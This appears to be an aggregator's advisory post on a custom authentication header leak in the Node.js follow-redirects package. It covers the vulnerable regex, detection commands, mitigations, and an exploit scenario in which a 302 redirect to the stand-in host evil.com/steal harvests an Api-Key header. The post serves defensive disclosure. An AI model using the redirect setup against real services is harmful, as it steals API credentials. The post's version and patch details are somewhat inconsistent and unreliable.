Nodejs follow-redirects, Custom Header Leak, CVE-PENDING (medium)

Listen to this Post

How the mentioned CVE works

The vulnerability resides in the `follow-redirects` package (used by axios) when handling cross-domain HTTP redirects (301, 302, 307, 308). On line 469-476 of index.js, the package applies a regex to strip only three specific headers: authorization, proxy-authorization, and cookie. Any custom authentication header – such as X-API-Key, X-Auth-Token, Api-Key, or `Token` – is not matched by the regex /^(?:(?:proxy-)?authorization|cookie)$/i. When a redirect crosses to a different protocol (e.g., http→https) or a non-subdomain host, the function `removeMatchingHeaders` is called. It removes only the headers matching that regex. All other headers remain intact. An attacker who controls the redirect target (via a malicious `Location:` header) can receive the original request’s custom auth header values. Because `follow-redirects` is the underlying redirect engine for axios (105K+ stars on GitHub), every axios user in Node.js that supplies custom authentication headers is potentially affected. The vulnerability was discovered through manual source code review on 2026-03-20. No CVE has been assigned yet, but the issue is medium severity due to credential leakage on cross-domain redirects.

dailycve form:

Platform: Node.js ecosystem
Version: follow-redirects <1.15.7
Vulnerability: Custom header leak
Severity: Medium
date: 2026-03-20

Prediction: 2026-04-10

What Undercode Say:

Check if your axios/follow-redirects is vulnerable
npm list follow-redirects
Grep for the vulnerable regex pattern
grep -n "removeMatchingHeaders(/^\(?:\(?:proxy-\)?authorization|cookie\)$/i" node_modules/follow-redirects/index.js
Simulate a vulnerable request
curl -v -H "X-API-Key: secret123" --location "http://victim.com/redirect-to-evil"
Monitor outgoing headers on redirect
node -e "const axios=require('axios'); axios.get('http://victim.com/redirect', {headers:{'X-Auth-Token':'leak'}}).catch(e=>console.log(e));"

Exploit:

Attacker hosts evil.com with a logging endpoint. Victim uses axios with custom header { 'Api-Key': 'live_secret' }. Victim requests https://api.victim.com/endpoint` which returns 302Location: https://evil.com/steal`. follow-redirects forwards the `Api-Key` header to evil.com. Attacker captures secret.

Protection from this CVE

Upgrade follow-redirects to patched version (≥1.15.7) once available. Manually override redirect handling: set `maxRedirects: 0` and implement custom redirect logic that strips all non-standard headers. Use a proxy to sanitize outgoing headers. Alternatively, avoid custom auth headers; use standard `Authorization: Bearer` which is stripped by the regex.

Impact

Leakage of any custom authentication header (API keys, tokens, session IDs) to arbitrary third-party domains on cross-domain redirects. Affects all Node.js applications using axios with custom headers. Credential theft, account takeover, lateral movement.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top